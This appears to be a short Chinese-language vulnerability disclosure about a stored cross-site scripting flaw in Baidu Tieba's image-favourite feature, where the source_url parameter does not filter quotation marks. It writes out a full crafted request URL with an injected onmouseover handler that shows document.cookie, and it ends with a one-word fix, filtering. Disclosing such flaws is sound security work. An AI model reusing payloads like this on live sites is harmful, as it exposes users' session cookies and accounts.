1.百度贴吧有个收藏图片的功能

 

2.点击收藏图片，截获请求,已收藏

 

3.这是一个get请求

 

4.复制这个请求连接到文本

5.这个参数&source_url=没有对"引号作过滤，可以构造xss,style属性设置一下全屏鼠标移动触发XSS

(构造好的请求)

 

http://up.xiangce.baidu.com/opencom/picture/fav/upload?app_id=314406&descript=缃伓鐜嫔啝&uid=448557988&source_url=http://tieba.baidu.com/f?kw=%E7%BD%81%B6%E7%8E%E6%C9%86%A0&from=prinaaaa"style="left: 0px; top: -8px; width: 100%; height: 100%; position: fixed; cursor: default !important;"onmouseover="alert(document.cookie)">&tags=百度贴吧,缃伓鐜嫔啝吧&url=http://imgsrc.baidu.com/forum/w%3D580%3B/sign=028792f753da81cb4ee683c5625dd116/b64543a98226cffcb1fec5b1bb014a90f703ead9.jpg&callback=jQuery17205619738968089223_1385372203420&_=1385372252309

 

 

 

6.然后访问一下

7.点击查看图片的时候就弹出来了

 

(这个cook没啥用,..............) 

 

6.有漏洞的功能位置，代码存在的位置，图上圈圈

 

 

修复方案：
过滤